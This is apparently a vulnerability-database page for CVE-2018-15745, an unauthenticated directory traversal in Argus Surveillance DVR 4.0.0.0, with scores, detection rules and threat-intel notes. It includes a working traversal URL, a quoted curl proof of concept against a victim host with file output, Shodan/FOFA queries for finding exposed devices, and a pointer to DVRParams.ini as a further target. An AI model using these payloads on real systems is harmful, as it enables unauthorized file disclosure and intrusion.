CVE-2018-15745
published 2018-08-30CVE-2018-15745: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE…
PriorityP273high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
ITWEXPLOIT
Exploited in the wild
EPSS
97.71%
99.9th percentile
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| argussurveillance | dvr | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=↗
command..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini↗
sigma↗
id: CVE-2018-15745
info:
name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
http:
- method: GET
path:
- "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "for 16-bit app support"
- "[drivers]"
condition: and
- type: status
status:
- 200- →Detect exploitation attempts by matching HTTP GET requests to /WEBACCOUNT.CGI containing the traversal sequence ..%2F in the RESULTPAGE parameter, particularly on port 8080. ↗
- →Alert on HTTP 200 responses to /WEBACCOUNT.CGI traversal requests whose body contains both 'for 16-bit app support' and '[drivers]', confirming successful file read of Windows\system.ini. ↗
- →Monitor for access to DVRParams.ini via directory traversal, as this file is a high-value target on Argus DVR systems and may expose additional credentials or vulnerabilities. ↗
- →Use Shodan/FOFA queries to identify exposed Argus DVR instances: shodan-query 'http.title:"web viewer for samsung dvr"' and fofa-query 'title="web viewer for samsung dvr"'. ↗
- ·The vulnerability affects only Argus Surveillance DVR version 4.0.0.0 and the product has never received a patch, meaning all deployed instances remain vulnerable. ↗
- ·The traversal is unauthenticated — no credentials are required (WEBACCOUNTID and WEBACCOUNTPASSWORD are empty), so network-level access to port 8080 is sufficient for exploitation. ↗
- ·This is a Windows-based application; traversal payloads should target Windows file paths (e.g., Windows\system.ini, C:\ProgramData\...) rather than Unix-style paths. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Argus Surveillance DVR 4.0.0.0 - Directory Traversal
exploitdb·2018-08-29
CVE-2018-15745 Argus Surveillance DVR 4.0.0.0 - Directory Traversal
Argus Surveillance DVR 4.0.0.0 - Directory Traversal
---
# Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal
# Author: John Page (aka hyp3rlinx)
# Date: 2018-08-28
# Vendor: www.argussurveillance.com
# Software Link: http://www.argussurveillance.com/download/DVR_stp.exe
# CVE: N/A
# Description:
# Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal,
# leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
# PoC
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
# Result:
; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON
Metasploit
Argus Surveillance DVR 4.0.0.0 - Directory Traversal
metasploit·CVSS 7.5
CVE-2018-15745 [HIGH] Argus Surveillance DVR 4.0.0.0 - Directory Traversal
Argus Surveillance DVR 4.0.0.0 - Directory Traversal
This module leverages an unauthenticated arbitrary file read for the Argus Surveillance 4.0.0.0 system which never saw an update since. As this is a Windows related application we recommend looking for common Windows file locations, especially C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini which houses another vulnerability in the Argus Surveillance system. This directory traversal vuln is being tracked as CVE-2018-15745
Nuclei
Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2018-15745 [HIGH] Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
Template:
id: CVE-2018-15745
info:
name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
author: gy741
severity: high
description: |
Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server.
remediation: |
Upgrade to a patched version of Argus Surveillance DVR.
reference:
- http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVE
http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txthttp://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.htmlhttps://www.exploit-db.com/exploits/45296/http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txthttp://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.htmlhttps://www.exploit-db.com/exploits/45296/
2018-08-30
Published
Exploited in the wild